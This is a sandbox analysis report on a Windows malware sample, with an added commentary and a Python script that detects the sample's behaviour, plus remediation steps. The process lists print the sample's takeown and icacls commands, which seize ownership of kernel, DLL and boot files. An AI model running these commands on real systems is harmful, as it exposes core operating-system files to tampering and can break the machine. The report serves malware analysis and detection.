Analysis Overview
SHA256
454ca1ab51dcd5f7b5654eeec763e8d45278d1f7a2ba48db0c8ffc52831bfd84
Threat Level: Likely malicious
The file 1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported
2024-07-02 20:14
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 20:14
Reported
2024-07-02 20:16
Platform
win7-20240508-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Boot\DVD\EFI\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\de-DE\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\es-ES\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\etfsboot.com | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\en-US\efisys.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\fr-FR\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\it-IT\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\ja-JP\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2EAE.tmp\2EBF.tmp\2EC0.bat C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntoskrnl.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Windows\Boot"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\Boot" /t /c /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\bfsvc.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\bfsvc.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\SHELL.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\SHELL.DLL" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\kernel32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\kernel32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\advapi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\advapi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\user32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\user32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\gdi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\gdi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\win32k.sys"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\win32k.sys" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntdll.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntdll.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ANSI.SYS"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ANSI.SYS" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\hall.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\hal.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Users\Public"
C:\Windows\system32\icacls.exe
ICACLS "C:\Users\Public" /t /c /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl"C:\Windows\System32\AdvencedInstallers"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\AdvencedInstallers" /t /c /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\Boot\winload.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\Boot\winload.exe" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\avicap.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\avicap.dll" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\COMMDLG.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\COMMDLG.DLL" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\keyboard.drv"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\keyboard.drv" /grant Admin:F
Network
Files
C:\Users\Admin\AppData\Local\Temp\2EAE.tmp\2EBF.tmp\2EC0.bat
| MD5 | 411b15479e88b188dc741f7f83eda07e |
| SHA1 | 1c2d076c497dd21f31d6cfb839fe809c6374ab70 |
| SHA256 | e1e7b274e80ebb009eacd476eb942a18dc4540bf2100d12009c73b64200d981a |
| SHA512 | fe3eea4ceeecaa279e46ebf29fa44814154083c9ba56f0591a4c399021075bfabd51a075ba5cbaa331a26d20958035bc45ec0badd0adc02ad1f0e8f1346e2a94 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-02 20:14
Reported
2024-07-02 20:16
Platform
win10v2004-20240508-en
Max time kernel
41s
Max time network
47s
Command Line
Signatures
Possible privilege escalation attempt
Modifies file permissions
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Boot\PCAT\et-EE\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\ru-RU\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\cs-CZ\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fi-FI\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\hu-HU\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\tr-TR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\cht_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\de-DE\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\segoen_slboot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\msjhn_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\hr-HR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\chs_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\ja-JP\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\zh-TW\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fi-FI\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_02_1af4.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\el-GR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\fr-FR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\nl-NL\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\zh-CN\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\en-GB\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-US\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\et-EE\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\zh-TW\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\kor_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\malgun_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\es-ES\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Resources\fr-FR\bootres.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-US\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\nb-NO\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pl-PL\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pt-PT\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\el-GR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ru-RU\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\it-IT\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Resources\ja-JP\bootres.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\it-IT\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\fr-FR\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\es-ES\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\sr-Latn-RS\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\en-US\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\fi-FI\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\en-US\efisys.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_07_1415.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\zh-TW\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\kd_02_8086.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ja-JP\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\EFI\BCD | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\ko-KR\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\cs-CZ\bootmgr.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\de-DE\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\qps-ploc\memtest.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\fr-FR\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\en-US\bootfix.bin | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\Fonts\msyhn_boot.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\nl-NL\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\PCAT\pt-BR\memtest.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\en-GB\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pt-BR\bootmgfw.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pt-PT\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\DVD\PCAT\boot.sdi | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\pl-PL\bootmgr.efi.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Boot\EFI\winsipolicy.p7b | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\519A.tmp\519B.tmp\519C.bat C:\Users\Admin\AppData\Local\Temp\1d499ca722b1d20f4f77ead9224b30c9_JaffaCakes118.exe"
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntoskrnl.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntoskrnl.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Windows\Boot"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\Boot" /t /c /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\bfsvc.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\bfsvc.exe" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\SHELL.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\SHELL.DLL" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\kernel32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\kernel32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\advapi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\advapi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\user32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\user32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\gdi32.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\gdi32.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\win32k.sys"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\win32k.sys" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ntdll.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ntdll.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\ANSI.SYS"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\ANSI.SYS" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\hall.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\hal.dll" /grant "Admin":F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl "C:\Users\Public"
C:\Windows\system32\icacls.exe
ICACLS "C:\Users\Public" /t /c /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -r -f -skipsl"C:\Windows\System32\AdvencedInstallers"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\AdvencedInstallers" /t /c /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System32\Boot\winload.exe"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System32\Boot\winload.exe" /grant "Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\avicap.dll"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\avicap.dll" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\COMMDLG.DLL"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\COMMDLG.DLL" /grant Admin:F
C:\Windows\system32\takeown.exe
takeown -f "C:\Windows\System\keyboard.drv"
C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\System\keyboard.drv" /grant Admin:F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\519A.tmp\519B.tmp\519C.bat
| MD5 | 411b15479e88b188dc741f7f83eda07e |
| SHA1 | 1c2d076c497dd21f31d6cfb839fe809c6374ab70 |
| SHA256 | e1e7b274e80ebb009eacd476eb942a18dc4540bf2100d12009c73b64200d981a |
| SHA512 | fe3eea4ceeecaa279e46ebf29fa44814154083c9ba56f0591a4c399021075bfabd51a075ba5cbaa331a26d20958035bc45ec0badd0adc02ad1f0e8f1346e2a94 |
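What the dropped batch file does, as recorded identically in the Processes sections of behavioral1 and behavioral2 above: for each of eighteen targets it runs takeown (which needs SeTakeOwnershipPrivilege, hence the AdjustPrivilegeToken signature) and then icacls to grant the sandbox user Admin full control. The targets are the kernel, HAL, win32k, the core user-mode DLLs, the 16-bit compatibility DLLs under C:\Windows\System, the boot loader and the whole C:\Windows\Boot tree; the recursive `-r` / `/t` pass over C:\Windows\Boot is what produces the long "File opened for modification" lists. On a stock install these files are owned by NT SERVICE\TrustedInstaller, so this is ACL tampering that prepares the ground for later file replacement rather than privilege escalation in itself; the elevated Admin account already holds the privilege. Note that the batch file's own mistakes are preserved verbatim in the report (takeown on `hall.dll` but icacls on `hal.dll`, `AdvencedInstallers`, the unclosed `"Admin:F`, the missing space in `-skipsl"C:\...`). The following Python is an added example, not part of the sandbox report: it re-types the command-line column as constructed sample input, pairs each takeown with the icacls that follows it, and flags protected paths, recursive passes and mismatched pairs. The list of protected prefixes and the pairing rule are this example's own assumptions, not the sandbox's logic.

```python
"""Pair takeown/icacls invocations from a sandbox process list and flag
ownership seizures of TrustedInstaller-protected Windows files."""
import re
from dataclasses import dataclass

# Assumption of this example: locations a stock Windows install keeps owned
# by TrustedInstaller. A takeown followed by icacls /grant here is ACL
# tampering (ATT&CK T1222.001); legitimate installers never need it.
PROTECTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\system",
                      r"c:\windows\boot", r"c:\windows\bfsvc.exe")
QUOTED = re.compile(r'"([^"]+)"')  # first quoted token is the path
GRANT = re.compile(r'/grant\s+"?([^":\s]+)"?:([A-Z(),]+)', re.IGNORECASE)

# Constructed sample: the command-line column of the report's Processes
# section, re-typed verbatim (typos and unbalanced quotes are the sample's).
SAMPLE_COMMANDS = r"""
takeown -f "C:\Windows\System32\ntoskrnl.exe"
ICACLS "C:\Windows\System32\ntoskrnl.exe" /grant "Admin":F
takeown -r -f -skipsl "C:\Windows\Boot"
ICACLS "C:\Windows\Boot" /t /c /grant "Admin":F
takeown -f "C:\Windows\bfsvc.exe"
ICACLS "C:\Windows\bfsvc.exe" /grant "Admin":F
takeown -f "C:\Windows\System\SHELL.DLL"
ICACLS "C:\Windows\System\SHELL.DLL" /grant "Admin:F
takeown -f "C:\Windows\System32\kernel32.dll"
ICACLS "C:\Windows\System32\kernel32.dll" /grant "Admin":F
takeown -f "C:\Windows\System32\advapi32.dll"
ICACLS "C:\Windows\System32\advapi32.dll" /grant "Admin":F
takeown -f "C:\Windows\System32\user32.dll"
ICACLS "C:\Windows\System32\user32.dll" /grant "Admin":F
takeown -f "C:\Windows\System32\gdi32.dll"
ICACLS "C:\Windows\System32\gdi32.dll" /grant "Admin":F
takeown -f "C:\Windows\System32\win32k.sys"
ICACLS "C:\Windows\System32\win32k.sys" /grant "Admin":F
takeown -f "C:\Windows\System32\ntdll.dll"
ICACLS "C:\Windows\System32\ntdll.dll" /grant "Admin":F
takeown -f "C:\Windows\System32\ANSI.SYS"
ICACLS "C:\Windows\System32\ANSI.SYS" /grant "Admin":F
takeown -f "C:\Windows\System32\hall.dll"
ICACLS "C:\Windows\System32\hal.dll" /grant "Admin":F
takeown -r -f -skipsl "C:\Users\Public"
ICACLS "C:\Users\Public" /t /c /grant "Admin:F
takeown -r -f -skipsl"C:\Windows\System32\AdvencedInstallers"
ICACLS "C:\Windows\System32\AdvencedInstallers" /t /c /grant Admin:F
takeown -f "C:\Windows\System32\Boot\winload.exe"
ICACLS "C:\Windows\System32\Boot\winload.exe" /grant "Admin:F
takeown -f "C:\Windows\System\avicap.dll"
ICACLS "C:\Windows\System\avicap.dll" /grant Admin:F
takeown -f "C:\Windows\System\COMMDLG.DLL"
ICACLS "C:\Windows\System\COMMDLG.DLL" /grant Admin:F
takeown -f "C:\Windows\System\keyboard.drv"
ICACLS "C:\Windows\System\keyboard.drv" /grant Admin:F
""".strip().splitlines()

@dataclass
class Seizure:
    target: str        # path named in takeown
    grant_target: str  # path named in the icacls that followed
    grantee: str
    rights: str
    recursive: bool    # takeown -r or icacls /t: whole tree affected
    protected: bool

def is_protected(path):
    p = path.lower().rstrip("\\")
    return any(p == pre or p.startswith(pre + "\\") for pre in PROTECTED_PREFIXES)

def pair_seizures(cmdlines):
    r"""Pair each takeown with the next icacls /grant. Only the first quoted
    token is read as the path, so the sample's -skipsl"C:\..." (no space)
    and its unclosed "Admin:F do not derail parsing."""
    seizures, pending = [], None
    for line in cmdlines:
        m = QUOTED.search(line)
        if not m:
            continue
        verb, path = line.split(None, 1)[0].lower(), m.group(1)
        flags = {t.lower() for t in line.split()}
        if verb == "takeown":
            pending = (path, "-r" in flags)
        elif verb == "icacls" and pending:
            g = GRANT.search(line)
            grantee, rights = (g.group(1), g.group(2).upper()) if g else ("?", "?")
            seizures.append(Seizure(pending[0], path, grantee, rights,
                                    pending[1] or "/t" in flags,
                                    is_protected(pending[0])))
            pending = None
    return seizures

def summarize(seizures):
    """Counts an analyst wants: protected paths hit, trees taken recursively,
    and pairs where takeown and icacls name different files (hall vs hal)."""
    return {
        "pairs": len(seizures),
        "protected": sum(s.protected for s in seizures),
        "recursive_protected": [s.target for s in seizures if s.recursive and s.protected],
        "mismatched": [(s.target, s.grant_target) for s in seizures
                       if s.target.lower() != s.grant_target.lower()],
        "grantees": sorted({s.grantee for s in seizures}),
    }
```

Run against the sample this reports 18 pairs, 17 of them under protected locations, two recursive tree seizures (C:\Windows\Boot and the misspelled AdvencedInstallers directory) and the one hall.dll/hal.dll mismatch; the same logic applies to real process-creation telemetry (Sysmon event 1 or Security 4688 command lines) where takeown.exe or icacls.exe spawned by cmd.exe against System32 targets is rare outside servicing. To undo the damage on an affected host, give the files back to TrustedInstaller and strip the grant (`icacls <path> /setowner "NT SERVICE\TrustedInstaller"` followed by `icacls <path> /remove:g Admin`), then run `sfc /scannow` to confirm none of the files were replaced.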